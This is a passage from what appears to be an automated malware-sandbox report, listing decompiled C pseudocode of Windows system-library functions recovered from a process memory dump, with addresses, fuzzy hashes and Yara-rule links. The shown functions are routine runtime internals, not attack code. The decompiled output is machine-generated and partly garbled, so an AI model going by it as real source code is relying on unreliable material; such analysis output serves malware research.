				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E02AA2280(_t6, 0x2b78550);
				}
				_t29 = E02AC387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E02A9FFB0(0x2b78550, _t27, 0x2b78550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x02ac37fa
0x02ac37fc
0x02ac3805
0x02ac3808
0x02ac3808
0x02ac3814
0x02ac3818
0x02ac3846
0x02ac3848
0x02ac384b
0x02ac384b
0x02ac3852
0x00000000
0x02ac3854
0x02ac3856
0x00000000
0x00000000
0x02ac3863
0x00000000
0x02ac3863
0x02ac381a
0x02ac381a
0x02ac381f
0x02ac386e
0x02ac386e
0x02ac3871
0x02ac3873
0x02ac3873
0x02ac3868
0x00000000
0x02ac3868
0x02ac3821
0x02ac3826
0x00000000
0x00000000
0x02ac3828
0x02ac382a
0x02ac3841
0x00000000
0x02ac3841

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be552b786a6232ec7177c6d064661e6227ed775785c0f208002a7f890feee442
Instruction ID: d704e44e2a4ecdff1e738ad673f7075c60584727679e332db50a1fb1d3d23772
Opcode Fuzzy Hash: be552b786a6232ec7177c6d064661e6227ed775785c0f208002a7f890feee442
Instruction Fuzzy Hash: D8019B729496109BCB378B1A9A90F36BBB7DF85B50B2580EDE9458B315DF30D801C790

Uniqueness

Uniqueness Score: -1.00%

Function 02A8C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02A8C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x2b7d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E02A9EEF0(0x2b770a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E02B0F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E02A9EB70(_t29, 0x2b770a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E02ACB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E02B0F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x2b770c0; // 0x0
					while(_t38 != 0x2b770c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x2b7b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x02a8c96a
0x02a8c974
0x02a8c988
0x02a8c98a
0x02af7c9d
0x02af7c9f
0x02af7ca4
0x02af7cae
0x02af7cf0
0x02af7cf5
0x02af7cfa
0x02a8c992
0x02a8c996
0x02a8c997
0x02a8c998
0x02a8c9a3
0x02a8c9a3
0x02af7cb0
0x02af7cb7
0x02af7cbb
0x00000000
0x00000000
0x02af7cbd
0x02af7ce8
0x02af7cc5
0x02af7cc8
0x02af7cca
0x02af7cd0
0x02af7cd6
0x02af7cde
0x02af7ce4
0x02af7ce4
0x02af7cd0
0x00000000
0x02af7ce8
0x02a8c990
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46376ca84a83c3549dcb707e4e1e020b2c10e445ecb94e8416050e1d2b1d19ba
Instruction ID: 752cc512c7e61c4158e65f9a1b399e4cdf8efa76a7190f5667ec7507c934f173
Opcode Fuzzy Hash: 46376ca84a83c3549dcb707e4e1e020b2c10e445ecb94e8416050e1d2b1d19ba
Instruction Fuzzy Hash: 831125317006069BDB50AF68CD85A6BF7F6BB84254F000569FA4283690DF24EC25CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 02AB002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AB002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E02AA7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E02AA7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E02AA7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E02AA7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x02ab0032
0x02ab0037
0x02ab0043
0x02af4b3a
0x02ab0049
0x02ab0049
0x02ab0049
0x02ab004e
0x02ab0053
0x02af4b48
0x02af4b5a
0x02af4b4a
0x02af4b53
0x02af4b53
0x02af4b5f
0x00000000
0x02af4b61
0x00000000
0x02af4b61
0x02ab0059
0x02ab0059
0x02ab0060
0x02af4b6f
0x02af4b6f
0x02ab0069
0x02af4b83
0x00000000
0x00000000
0x02af4b90
0x02af4b9b
0x02af4b9b
0x02af4ba4
0x00000000
0x00000000
0x02af4baa
0x00000000
0x02ab006f
0x02ab006f
0x00000000
0x02ab006f
0x02ab0069

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 5448b1a57624fe2641ed494ca5392c5490e2bfb3c0aa939f0cc6d84e8eb46736
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 4611C4366057818FD7639BA8CA94B7B77E9EF45758F0900A0EF04876A3DF2CD841CA60

Uniqueness

Uniqueness Score: -1.00%

Function 02A9766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02A9766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E02ABF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E02ABF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L02AA4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x02a97672
0x02a9767f
0x02a97689
0x02a976de
0x02a976de
0x02a9768b
0x02a97691
0x02a97693
0x02a97697
0x00000000
0x02a97699
0x02a976a8
0x00000000
0x02a976aa
0x02a976ad
0x02a976b1
0x00000000
0x02a976b3
0x02a976b3
0x02a976b5
0x02a976ba
0x02a976bc
0x02a976bc
0x02a976c0
0x00000000
0x02a976c2
0x02a976ce
0x02a976ce
0x02a976c0
0x02a976b1
0x02a976a8
0x02a97697
0x02a976d9

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 2b6a44773589f085deb92da84dfe2f3499d96a6f0ff8bc1c6c92fbe2c7d27492
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 41017572711119ABCB21DE5FCD51E5BB7EDEB84A60B150564BA18CB250DE30DD11C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 02A89080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02A89080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x2b785ec;
				E02AA2280(_t48, 0x2b785ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E02A9FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x2b7538c; // 0x771c6848
					if( *_t84 != 0x2b75388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x2b5f6e8);
						E02ADD0E8(0x2b785ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E02B588F5(_t80, _t85, 0x2b75388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x2b786c0; // 0x24807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x2b786b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E02AA2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E02B588F5(0x2b785ec, _t85, 0x2b75388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E02ACAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x2b7b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x2b784c0;
																			if(_t82 >=  *0x2b784c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E02B59063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E02A8922A(_t99);
										_t64 = E02AA7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E02B58B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x2b786c0; // 0x24807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x2b786b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x2b786bc;
													_t87 = 0x2b786b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E02A89240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x2b786c4;
												_t87 = 0x2b786c0;
												L27:
												E02AB9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E02ADD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x2b75388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x2b7538c = _t51;
						goto L6;
					}
				}
			}

0x02a89082
0x02a89083
0x02a89084
0x02a89085
0x02a89087
0x02a89096
0x02a89098
0x02a89098
0x02a8909e
0x02a890a8
0x02a890e7
0x02a890e7
0x02a890aa
0x02a890b0
0x02a890b7
0x02a890bd
0x02a890dd
0x02a890e6
0x02a890bf
0x02a890bf
0x02a890c7
0x02a890cf
0x02a890f1
0x02a890f2
0x02a890f4
0x02a890f5
0x02a890f6
0x02a890f7
0x02a890f8
0x02a890f9
0x02a890fa
0x02a890fb
0x02a890fc
0x02a890fd
0x02a890fe
0x02a890ff
0x02a89100
0x02a89102
0x02a89107
0x02a8910c
0x02a89110
0x02a89113
0x02a89115
0x02a89136
0x02a8913f
0x02a89143
0x02ae37e4
0x02ae37e4
0x02a89117
0x02a89117
0x02a8911d
0x00000000
0x02a8911f
0x02a8911f
0x02a89125
0x00000000
0x02a89127
0x02a8912d
0x02a89130
0x02a89134
0x02a89158
0x02a8915d
0x02a89161
0x02a89168
0x02ae3715
0x02a8916e
0x02a8916e
0x02a89175
0x02a89177
0x02a8917e
0x02a8917f
0x02a89182
0x02a89182
0x02a89187
0x02a89187
0x02a8918a
0x02a8918d
0x02a8918f
0x02a89192
0x02a89195
0x02a89198
0x02a89198
0x02a89198
0x02a8919a
0x00000000
0x00000000
0x02ae371f
0x02ae3721
0x02ae3727
0x02ae372f
0x02ae3733
0x02ae3735
0x02ae3738
0x02ae373b
0x02ae373d
0x02ae3740
0x00000000
0x02ae3746
0x02ae3746
0x02ae3749
0x00000000
0x02ae374f
0x02ae374f
0x02ae3751
0x02ae3757
0x02ae3759
0x02ae375c
0x02ae375c
0x02ae375e
0x02ae375e
0x02ae3761
0x02ae3764
0x00000000
0x00000000
0x02ae3766
0x02ae3768
0x02ae37a3
0x02ae37a3
0x02ae37a5
0x02ae37a7
0x02ae37ad
0x02ae37b0
0x02ae37b2
0x02ae37bc
0x02ae37c2
0x02ae37c2
0x02ae37b2
0x02a89187
0x02a89187
0x02a8918a
0x02a8918d
0x02a8918f
0x02a89192
0x02a89195
0x00000000
0x02a89195
0x00000000
0x02ae376a
0x02ae376a
0x02ae376a
0x02ae376c
0x02ae376c
0x02ae376f
0x02ae3775
0x00000000
0x00000000
0x02ae3777
0x02ae3779
0x02ae3782
0x02ae3787
0x02ae3789
0x02ae3790
0x02ae3790
0x02ae378b
0x02ae378b
0x02ae378b
0x02ae3792
0x02ae3795
0x00000000
0x02ae3795
0x00000000
0x02ae3779
0x02ae3798
0x00000000
0x02ae3798
0x00000000
0x02ae3768
0x02ae379b
0x02ae379b
0x02ae3751
0x02ae3749
0x00000000
0x02ae3740
0x02a891a0
0x02a891a3
0x02a891a9
0x02a891b0
0x00000000
0x02a891b0
0x02a89187
0x02a891b4
0x02a891b4
0x02a891bb
0x02a891c0
0x02a891c5
0x02a891c7
0x02ae37da
0x02a891cd
0x02a891cd
0x02a891cd
0x02a891d2
0x02a891d5
0x02a89239
0x02a89239
0x02a891d7
0x02a891db
0x02a891e1
0x02a891e7
0x02a891fd
0x02a89203
0x02a8921e
0x02a89223
0x00000000
0x02a89205
0x02a89205
0x02a89208
0x02a8920c
0x02a89214
0x02a89214
0x02a8920c
0x02a891e9
0x02a891e9
0x02a891ee
0x02a891f3
0x02a891f3
0x02a891f3
0x02a891e7
0x00000000
0x00000000
0x00000000
0x02a89134
0x02a89125
0x02a8911d
0x02a8914e
0x02a890d1
0x02a890d1
0x02a890d3
0x02a890d6
0x02a890d8
0x00000000
0x02a890d8
0x02a890cf

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499e357d07cab50221254f89230f6bd6710eaddba3d27d712d3e3bd889168cd0
Instruction ID: c85537a3aaefe2274194cab5289419cbf004581a1247a2921895e795d119ab97
Opcode Fuzzy Hash: 499e357d07cab50221254f89230f6bd6710eaddba3d27d712d3e3bd889168cd0
Instruction Fuzzy Hash: 6101F4729012058FC324AF04D880B27BBF9EF45320F228066E505DB7A1CB70EC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E02B1C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E02AC9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E02AC95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E02AC95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E02AC95D0();
				return L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x02b1c458
0x02b1c45d
0x02b1c466
0x02b1c468
0x02b1c469
0x02b1c46a
0x02b1c46b
0x02b1c46e
0x02b1c46f
0x02b1c471
0x02b1c476
0x02b1c476
0x02b1c47c
0x02b1c47e
0x02b1c480
0x02b1c480
0x02b1c483
0x02b1c484
0x02b1c486
0x02b1c488
0x02b1c48f
0x02b1c491
0x02b1c493
0x02b1c493
0x02b1c48f
0x02b1c498
0x02b1c49e
0x02b1c4ad
0x02b1c4ad
0x02b1c4b2
0x02b1c4b4
0x02b1c4cd

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 668e51a171269e67bb18c52088bc4128e0a97c1a6b15bbc5641b6f35ed397df9
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: D201807218060AFFE721AF65CD81E73FB6EFF54394F544529F11446560CB21ACA0CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B54015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02B54015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E02AA2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E02AA2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2b786ac);
					E02A8F900(0x2b786d4, _t28);
					E02A9FFB0(0x2b786ac, _t28, 0x2b786ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E02A9FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x02b5401a
0x02b5401e
0x02b54023
0x02b54028
0x02b54029
0x02b5402b
0x02b5402f
0x02b54043
0x02b54046
0x02b54051
0x02b54057
0x02b5405f
0x02b54062
0x02b54067
0x02b5406f
0x02b5407c
0x02b5407c
0x02b5408c
0x02b5408c
0x02b54097

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2933b5062626f6cf6821cab2a73a1ec63ac7aa84df1dd3cd3f9a671ffa6aa54
Instruction ID: 31ba17f7e9f93a06a98670b7950307b658a1d713411e39bb8bd38fbff0278be9
Opcode Fuzzy Hash: c2933b5062626f6cf6821cab2a73a1ec63ac7aa84df1dd3cd3f9a671ffa6aa54
Instruction Fuzzy Hash: 95018F72281A45BFD611AF6ACE84F67F7ADEF45760B000265B908C7A11CF24EC51CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 02B4138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E02B4138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2b7d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02ACFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E02AA7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x02b4138a
0x02b4138a
0x02b41399
0x02b413a3
0x02b413a8
0x02b413aa
0x02b413b5
0x02b413bb
0x02b413c3
0x02b413c6
0x02b413c9
0x02b413d4
0x02b413e6
0x02b413d6
0x02b413df
0x02b413df
0x02b413f1
0x02b413f2
0x02b413f4
0x02b413f9
0x02b4140e

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff5f879448bac7fa1edf99abf2c97df7f25831346e4340598dd8d0a26f50c29
Instruction ID: cade6f6e8b7e6c18f04ecd2e390d4196204aab5c3913b62ae6b546c52bce4832
Opcode Fuzzy Hash: 6ff5f879448bac7fa1edf99abf2c97df7f25831346e4340598dd8d0a26f50c29
Instruction Fuzzy Hash: 06015271E40318BFCB14DFA9D981EAEB7B8EF44710F10405AB905EB280DA749A51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02B414FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E02B414FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2b7d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02ACFA60( &_v60, 0, 0x30);
				_v20 = _a4;
